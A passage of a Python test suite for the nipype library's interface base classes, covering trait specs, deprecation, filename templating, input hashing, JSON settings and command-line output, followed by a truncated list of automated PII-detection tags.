lambda: setattr(a, 'foo', 'a') + yield assert_raises, Exception, assign_a + pkld_a = dumps(a) + unpkld_a = loads(pkld_a) + assign_a_again = lambda: setattr(unpkld_a, 'foo', 'a') + yield assert_raises, Exception, assign_a_again + + +def test_TraitedSpec_logic(): + class spec3(nib.TraitedSpec): + _xor_inputs = ('foo', 'bar') + + foo = nib.traits.Int(xor=_xor_inputs, + desc='foo or bar, not both') + bar = nib.traits.Int(xor=_xor_inputs, + desc='bar or foo, not both') + kung = nib.traits.Float(requires=('foo',), + position=0, + desc='kung foo') + + class out3(nib.TraitedSpec): + output = nib.traits.Int + + class MyInterface(nib.BaseInterface): + input_spec = spec3 + output_spec = out3 + + myif = MyInterface() + yield assert_raises, TypeError, setattr(myif.inputs, 'kung', 10.0) + myif.inputs.foo = 1 + yield assert_equal, myif.inputs.foo, 1 + set_bar = lambda: setattr(myif.inputs, 'bar', 1) + yield assert_raises, IOError, set_bar + yield assert_equal, myif.inputs.foo, 1 + myif.inputs.kung = 2 + yield assert_equal, myif.inputs.kung, 2.0 + + +def test_deprecation(): + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec1(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='0.1') + spec_instance = DeprecationSpec1() + set_foo = lambda: setattr(spec_instance, 'foo', 1) + yield assert_raises, nib.TraitError, set_foo + yield assert_equal, len(w), 0, 'no warnings, just errors' + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec1numeric(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='0.1') + spec_instance = DeprecationSpec1numeric() + set_foo = lambda: setattr(spec_instance, 'foo', 1) + yield assert_raises, nib.TraitError, set_foo + yield assert_equal, len(w), 0, 'no warnings, just errors' + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec2(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='100', new_name='bar') + spec_instance = DeprecationSpec2() + set_foo = lambda: setattr(spec_instance, 'foo', 1) + yield assert_raises, nib.TraitError, set_foo + yield assert_equal, len(w), 0, 'no warnings, just errors' + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec3(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='1000', new_name='bar') + bar = nib.traits.Int() + spec_instance = DeprecationSpec3() + not_raised = True + try: + spec_instance.foo = 1 + except nib.TraitError: + not_raised = False + yield assert_true, not_raised + yield assert_equal, len(w), 1, 'deprecated warning 1 %s' % [w1.message for w1 in w] + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec3(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='1000', new_name='bar') + bar = nib.traits.Int() + spec_instance = DeprecationSpec3() + not_raised = True + try: + spec_instance.foo = 1 + except nib.TraitError: + not_raised = False + yield assert_true, not_raised + yield assert_equal, spec_instance.foo, Undefined + yield assert_equal, spec_instance.bar, 1 + yield assert_equal, len(w), 1, 'deprecated warning 2 %s' % [w1.message for w1 in w] + + +def test_namesource(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec2(nib.CommandLineInputSpec): + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=2) + doo = nib.File(exists=True, argstr=""%s"", position=1) + goo = traits.Int(argstr=""%d"", position=4) + poo = nib.File(name_source=['goo'], hash_files=False, argstr=""%s"", position=3) + + class TestName(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec2 + testobj = TestName() + testobj.inputs.doo = tmp_infile + testobj.inputs.goo = 99 + yield assert_true, '%s_generated' % nme in testobj.cmdline + testobj.inputs.moo = ""my_%s_template"" + yield assert_true, 'my_%s_template' % nme in testobj.cmdline + os.chdir(pwd) + teardown_file(tmpd) + + +def test_chained_namesource(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec2(nib.CommandLineInputSpec): + doo = nib.File(exists=True, argstr=""%s"", position=1) + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=2, name_template='%s_mootpl') + poo = nib.File(name_source=['moo'], hash_files=False, + argstr=""%s"", position=3) + + class TestName(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec2 + + testobj = TestName() + testobj.inputs.doo = tmp_infile + res = testobj.cmdline + yield assert_true, '%s' % tmp_infile in res + yield assert_true, '%s_mootpl ' % nme in res + yield assert_true, '%s_mootpl_generated' % nme in res + + os.chdir(pwd) + teardown_file(tmpd) + + +def test_cycle_namesource1(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec3(nib.CommandLineInputSpec): + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=1, name_template='%s_mootpl') + poo = nib.File(name_source=['moo'], hash_files=False, + argstr=""%s"", position=2) + doo = nib.File(name_source=['poo'], hash_files=False, + argstr=""%s"", position=3) + + class TestCycle(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec3 + + # Check that an exception is raised + to0 = TestCycle() + not_raised = True + try: + to0.cmdline + except nib.NipypeInterfaceError: + not_raised = False + yield assert_false, not_raised + + os.chdir(pwd) + teardown_file(tmpd) + + +def test_cycle_namesource2(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec3(nib.CommandLineInputSpec): + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=1, name_template='%s_mootpl') + poo = nib.File(name_source=['moo'], hash_files=False, + argstr=""%s"", position=2) + doo = nib.File(name_source=['poo'], hash_files=False, + argstr=""%s"", position=3) + + class TestCycle(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec3 + + # Check that loop can be broken by setting one of the inputs + to1 = TestCycle() + to1.inputs.poo = tmp_infile + + not_raised = True + try: + res = to1.cmdline + except nib.NipypeInterfaceError: + not_raised = False + print(res) + + yield assert_true, not_raised + yield assert_true, '%s' % tmp_infile in res + yield assert_true, '%s_generated' % nme in res + yield assert_true, '%s_generated_mootpl' % nme in res + + os.chdir(pwd) + teardown_file(tmpd) + + +def checknose(): + """"""check version of nose for known incompatability"""""" + mod = __import__('nose') + if mod.__versioninfo__[1] <= 11: + return 0 + else: + return 1 + + +@skipif(checknose) +def test_TraitedSpec_withFile(): + tmp_infile = setup_file() + tmpd, nme = os.path.split(tmp_infile) + yield assert_true, os.path.exists(tmp_infile) + + class spec2(nib.TraitedSpec): + moo = nib.File(exists=True) + doo = nib.traits.List(nib.File(exists=True)) + infields = spec2(moo=tmp_infile, doo=[tmp_infile]) + hashval = infields.get_hashval(hash_method='content') + yield assert_equal, hashval[1], 'PI:KEY' + teardown_file(tmpd) + + +@skipif(checknose) +def test_TraitedSpec_withNoFileHashing(): + tmp_infile = setup_file() + tmpd, nme = os.path.split(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + yield assert_true, os.path.exists(tmp_infile) + + class spec2(nib.TraitedSpec): + moo = nib.File(exists=True, hash_files=False) + doo = nib.traits.List(nib.File(exists=True)) + infields = spec2(moo=nme, doo=[tmp_infile]) + hashval = infields.get_hashval(hash_method='content') + yield assert_equal, hashval[1], 'PI:KEY' + + class spec3(nib.TraitedSpec): + moo = nib.File(exists=True, name_source=""doo"") + doo = nib.traits.List(nib.File(exists=True)) + infields = spec3(moo=nme, doo=[tmp_infile]) + hashval1 = infields.get_hashval(hash_method='content') + + class spec4(nib.TraitedSpec): + moo = nib.File(exists=True) + doo = nib.traits.List(nib.File(exists=True)) + infields = spec4(moo=nme, doo=[tmp_infile]) + hashval2 = infields.get_hashval(hash_method='content') + + yield assert_not_equal, hashval1[1], hashval2[1] + os.chdir(pwd) + teardown_file(tmpd) + + +def test_Interface(): + yield assert_equal, nib.Interface.input_spec, None + yield assert_equal, nib.Interface.output_spec, None + yield assert_raises, NotImplementedError, nib.Interface + yield assert_raises, NotImplementedError, nib.Interface.help + yield assert_raises, NotImplementedError, nib.Interface._inputs_help + yield assert_raises, NotImplementedError, nib.Interface._outputs_help + yield assert_raises, NotImplementedError, nib.Interface._outputs + + class DerivedInterface(nib.Interface): + def __init__(self): + pass + + nif = DerivedInterface() + yield assert_raises, NotImplementedError, nif.run + yield assert_raises, NotImplementedError, nif.aggregate_outputs + yield assert_raises, NotImplementedError, nif._list_outputs + yield assert_raises, NotImplementedError, nif._get_filecopy_info + + +def test_BaseInterface(): + yield assert_equal, nib.BaseInterface.help(), None + yield assert_equal, nib.BaseInterface._get_filecopy_info(), [] + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + goo = nib.traits.Int(desc='a random int', mandatory=True) + moo = nib.traits.Int(desc='a random int', mandatory=False) + hoo = nib.traits.Int(desc='a random int', usedefault=True) + zoo = nib.File(desc='a file', copyfile=False) + woo = nib.File(desc='a file', copyfile=True) + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class DerivedInterface(nib.BaseInterface): + input_spec = InputSpec + + yield assert_equal, DerivedInterface.help(), None + yield assert_true, 'moo' in ''.join(DerivedInterface._inputs_help()) + yield assert_equal, DerivedInterface()._outputs(), None + yield assert_equal, DerivedInterface._get_filecopy_info()[0]['key'], 'woo' + yield assert_true, DerivedInterface._get_filecopy_info()[0]['copy'] + yield assert_equal, DerivedInterface._get_filecopy_info()[1]['key'], 'zoo' + yield assert_false, DerivedInterface._get_filecopy_info()[1]['copy'] + yield assert_equal, DerivedInterface().inputs.foo, Undefined + yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs + yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None + yield assert_raises, ValueError, DerivedInterface().run + yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run + + class DerivedInterface2(DerivedInterface): + output_spec = OutputSpec + + def _run_interface(self, runtime): + return runtime + + yield assert_equal, DerivedInterface2.help(), None + yield assert_equal, DerivedInterface2()._outputs().foo, Undefined + yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run + + nib.BaseInterface.input_spec = None + yield assert_raises, Exception, nib.BaseInterface + +def test_BaseInterface_load_save_inputs(): + tmp_dir = tempfile.mkdtemp() + tmp_json = os.path.join(tmp_dir, 'settings.json') + + class InputSpec(nib.TraitedSpec): + input1 = nib.traits.Int() + input2 = nib.traits.Float() + input3 = nib.traits.Bool() + input4 = nib.traits.Str() + + class DerivedInterface(nib.BaseInterface): + input_spec = InputSpec + + def __init__(self, **inputs): + super(DerivedInterface, self).__init__(**inputs) + + inputs_dict = {'input1': 12, 'input3': True, + 'input4': 'some string'} + bif = DerivedInterface(**inputs_dict) + bif.save_inputs_to_json(tmp_json) + bif2 = DerivedInterface() + bif2.load_inputs_from_json(tmp_json) + yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict + + bif3 = DerivedInterface(from_file=tmp_json) + yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict + + inputs_dict2 = inputs_dict.copy() + inputs_dict2.update({'input4': 'some other string'}) + bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2['input4']) + yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2 + + bif5 = DerivedInterface(input4=inputs_dict2['input4']) + bif5.load_inputs_from_json(tmp_json, overwrite=False) + yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2 + + bif6 = DerivedInterface(input4=inputs_dict2['input4']) + bif6.load_inputs_from_json(tmp_json) + yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict + + # test get hashval in a complex interface + from nipype.interfaces.ants import Registration + settings = example_data(example_data('smri_ants_registration_settings.json')) + with open(settings) as setf: + data_dict = json.load(setf) + + tsthash = Registration() + tsthash.load_inputs_from_json(settings) + yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree()) + + tsthash2 = Registration(from_file=settings) + yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree()) + + _, hashvalue = tsthash.inputs.get_hashval(hash_method='timestamp') + yield assert_equal, 'ec5755e07287e04a4b409e03b77a517c', hashvalue + +def test_input_version(): + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + obj = DerivedInterface1() + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + config.set('execution', 'stop_on_unknown_version', True) + yield assert_raises, Exception, obj._check_version_requirements, obj.inputs + + config.set_default_config() + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.8' + obj = DerivedInterface1() + obj.inputs.foo = 1 + yield assert_raises, Exception, obj._check_version_requirements + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.10' + obj = DerivedInterface1() + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.9' + obj = DerivedInterface1() + obj.inputs.foo = 1 + not_raised = True + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', max_ver='0.7') + + class DerivedInterface2(nib.BaseInterface): + input_spec = InputSpec + _version = '0.8' + obj = DerivedInterface2() + obj.inputs.foo = 1 + yield assert_raises, Exception, obj._check_version_requirements + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', max_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.9' + obj = DerivedInterface1() + obj.inputs.foo = 1 + not_raised = True + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + +def test_output_version(): + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + output_spec = OutputSpec + _version = '0.10' + obj = DerivedInterface1() + yield assert_equal, obj._check_version_requirements(obj._outputs()), [] + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.11') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + output_spec = OutputSpec + _version = '0.10' + obj = DerivedInterface1() + yield assert_equal, obj._check_version_requirements(obj._outputs()), ['foo'] + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.11') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + output_spec = OutputSpec + _version = '0.10' + + def _run_interface(self, runtime): + return runtime + + def _list_outputs(self): + return {'foo': 1} + obj = DerivedInterface1() + yield assert_raises, KeyError, obj.run + + +def test_Commandline(): + yield assert_raises, Exception, nib.CommandLine + ci = nib.CommandLine(command='which') + yield assert_equal, ci.cmd, 'which' + yield assert_equal, ci.inputs.args, Undefined + ci2 = nib.CommandLine(command='which', args='ls') + yield assert_equal, ci2.cmdline, 'which ls' + ci3 = nib.CommandLine(command='echo') + ci3.inputs.environ = {'MYENV': 'foo'} + res = ci3.run() + yield assert_equal, res.runtime.environ['MYENV'], 'foo' + yield assert_equal, res.outputs, None + + class CommandLineInputSpec1(nib.CommandLineInputSpec): + foo = nib.Str(argstr='%s', desc='a str') + goo = nib.traits.Bool(argstr='-g', desc='a bool', position=0) + hoo = nib.traits.List(argstr='-l %s', desc='a list') + moo = nib.traits.List(argstr='-i %d...', desc='a repeated list', + position=-1) + noo = nib.traits.Int(argstr='-x %d', desc='an int') + roo = nib.traits.Str(desc='not on command line') + soo = nib.traits.Bool(argstr=""-soo"") + nib.CommandLine.input_spec = CommandLineInputSpec1 + ci4 = nib.CommandLine(command='cmd') + ci4.inputs.foo = 'foo' + ci4.inputs.goo = True + ci4.inputs.hoo = ['a', 'b'] + ci4.inputs.moo = [1, 2, 3] + ci4.inputs.noo = 0 + ci4.inputs.roo = 'hello' + ci4.inputs.soo = False + cmd = ci4._parse_inputs() + yield assert_equal, cmd[0], '-g' + yield assert_equal, cmd[-1], '-i 1 -i 2 -i 3' + yield assert_true, 'hello' not in ' '.join(cmd) + yield assert_true, '-soo' not in ' '.join(cmd) + ci4.inputs.soo = True + cmd = ci4._parse_inputs() + yield assert_true, '-soo' in ' '.join(cmd) + + class CommandLineInputSpec2(nib.CommandLineInputSpec): + foo = nib.File(argstr='%s', desc='a str', genfile=True) + nib.CommandLine.input_spec = CommandLineInputSpec2 + ci5 = nib.CommandLine(command='cmd') + yield assert_raises, NotImplementedError, ci5._parse_inputs + + class DerivedClass(nib.CommandLine): + input_spec = CommandLineInputSpec2 + + def _gen_filename(self, name): + return 'filename' + + ci6 = DerivedClass(command='cmd') + yield assert_equal, ci6._parse_inputs()[0], 'filename' + nib.CommandLine.input_spec = nib.CommandLineInputSpec + + +def test_Commandline_environ(): + from nipype import config + config.set_default_config() + ci3 = nib.CommandLine(command='echo') + res = ci3.run() + yield assert_equal, res.runtime.environ['DISPLAY'], ':1' + config.set('execution', 'display_variable', ':3') + res = ci3.run() + yield assert_false, 'DISPLAY' in ci3.inputs.environ + yield assert_equal, res.runtime.environ['DISPLAY'], ':3' + ci3.inputs.environ = {'DISPLAY': ':2'} + res = ci3.run() + yield assert_equal, res.runtime.environ['DISPLAY'], ':2' + + +def test_CommandLine_output(): + tmp_infile = setup_file() + tmpd, name = os.path.split(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + yield assert_true, os.path.exists(tmp_infile) + ci = nib.CommandLine(command='ls -l') + ci.inputs.terminal_output = 'allatonce' + res = ci.run() + yield assert_equal, res.runtime.merged, '' + yield assert_true, name in res.runtime.stdout + ci = nib.CommandLine(command='ls -l') + ci.inputs.terminal_output = 'file' + res = ci.run() + yield assert_true, 'stdout.nipype' in res.runtime.stdout + yield assert_true, isinstance(res.runtime.stdout, (str, bytes)) + ci = nib.CommandLine(command='ls -l') + ci.inputs.terminal_output = 'none' + res = ci.run() + yield assert_equal, res.runtime.stdout, '' + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_true, 'stdout.nipype' in res.runtime.stdout + os.chdir(pwd) + teardown_file(tmpd) + + +def test_global_CommandLine_output(): + tmp_infile = setup_file() + tmpd, name = os.path.split(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_true, name in res.runtime.stdout + yield assert_true, os.path.exists(tmp_infile) + nib.CommandLine.set_default_terminal_output('allatonce') + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_equal, res.runtime.merged, '' + yield assert_true, name in res.runtime.stdout + nib.CommandLine.set_default_terminal_output('file') + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_true, 'stdout.nipype' in res.runtime.stdout + nib.CommandLine.set_default_terminal_output('none') + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_equal, res.runtime.stdout, '' + os.chdir(pwd) + teardown_file(tmpd) + +def assert_not_raises(fn, *args, **kwargs): + fn(*args, **kwargs) + return True + +def check_dict(ref_dict, tst_dict): + """"""Compare dictionaries of inputs and and those loaded from json files"""""" + def to_list(x): + if isinstance(x, tuple): + x = list(x) + + if isinstance(x, list): + for i, xel in enumerate(x): + x[i] = to_list(xel) + + return x + + failed_dict = {} + for key, value in list(ref_dict.items()): + newval = to_list(tst_dict[key]) + if newval != value: + failed_dict[key] = (value, newval) + return failed_dict + +",26974,"[['UK_NHS', '0000000000'], ['PERSON', 'ts=4 sw=4'], ['PERSON', 'simplejson'], ['PERSON', 'Bunch(b=2'], ['LOCATION', 'c=3'], ['LOCATION', 'b=2'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'os.path.join(tmp_dir'], ['PERSON', 'teardown_file(tmp_dir'], ['NRP', 'shutil.rmtree(tmp_dir'], ['LOCATION', 'spec().goo'], ['PERSON', 'BaseTraitedSpec'], ['DATE_TIME', ""desc='bar""], ['LOCATION', 'myif.inputs.kung'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'my_%s_template'], ['PERSON', 'testobj'], ['LOCATION', 's_mootpl'], ['LOCATION', 'test_cycle_namesource2'], ['PERSON', '=tmp_infile'], ['PERSON', 'hashval1'], ['PERSON', 'nif'], ['LOCATION', 'nib.BaseInterface.help'], ['PERSON', 'tmp_json = os.path.join(tmp_dir'], ['PERSON', 'Int'], ['PERSON', 'Bool'], ['PERSON', 'input4 = nib.traits'], ['PERSON', 'input4'], ['PERSON', 'input4'], ['PERSON', 'setf'], ['LOCATION', 'tsthash.inputs.get_traitsfree'], ['LOCATION', 'tsthash2.inputs.get_traitsfree'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['NRP', ""desc='a""], ['LOCATION', ""desc='an""], ['PERSON', 'roo = nib.traits'], ['PERSON', ""ci6 = DerivedClass(command='cmd'""], ['LOCATION', 'test_CommandLine_output'], ['PERSON', 'fn(*args'], ['LOCATION', 'json'], ['PERSON', 'to_list(xel'], ['URL', 'library.in'], ['URL', 'nipype.interfaces.ba'], ['URL', 'nipype.utils.fi'], ['URL', 'nipype.interfaces.ba'], ['URL', 'traits.testing.no'], ['URL', 'b.ge'], ['URL', 'b.ge'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'nib.md'], ['URL', 'fp.re'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Tr'], ['URL', 'infields.ge'], ['URL', 'nib.Ba'], ['URL', 'a.ad'], ['URL', 'nib.traits.Int'], ['URL', 'a.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.in'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'w1.me'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'instance.fo'], ['URL', 'instance.ba'], ['URL', 'w1.me'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.in'], ['URL', 'testobj.cm'], ['URL', 'testobj.inputs.mo'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to0.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to1.in'], ['URL', 'to1.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.ch'], ['URL', 'nib.Interface.in'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nif.ru'], ['URL', 'nif.ag'], ['URL', 'nib.Ba'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', '.inputs.fo'], ['URL', 'nib.BaseInterface.in'], ['URL', 'nib.Ba'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.St'], ['URL', 'nib.Ba'], ['URL', 'bif.sa'], ['URL', 'bif2.inputs.ge'], ['URL', 'bif3.inputs.ge'], ['URL', 'dict.co'], ['URL', 'bif4.inputs.ge'], ['URL', 'bif5.inputs.ge'], ['URL', 'bif6.inputs.ge'], ['URL', 'nipype.interfaces.an'], ['URL', 'tsthash.inputs.ge'], ['URL', 'tsthash2.inputs.ge'], ['URL', 'tsthash.inputs.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.ru'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'ci.cm'], ['URL', 'ci.inputs.ar'], ['URL', 'nib.Com'], ['URL', 'ci2.cm'], ['URL', 'nib.Com'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'nib.Com'], ['URL', 'nib.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'ci4.inputs.fo'], ['URL', 'ci4.in'], ['URL', 'ci4.in'], ['URL', 'ci4.inputs.mo'], ['URL', 'ci4.inputs.no'], ['URL', 'ci4.inputs.ro'], ['URL', 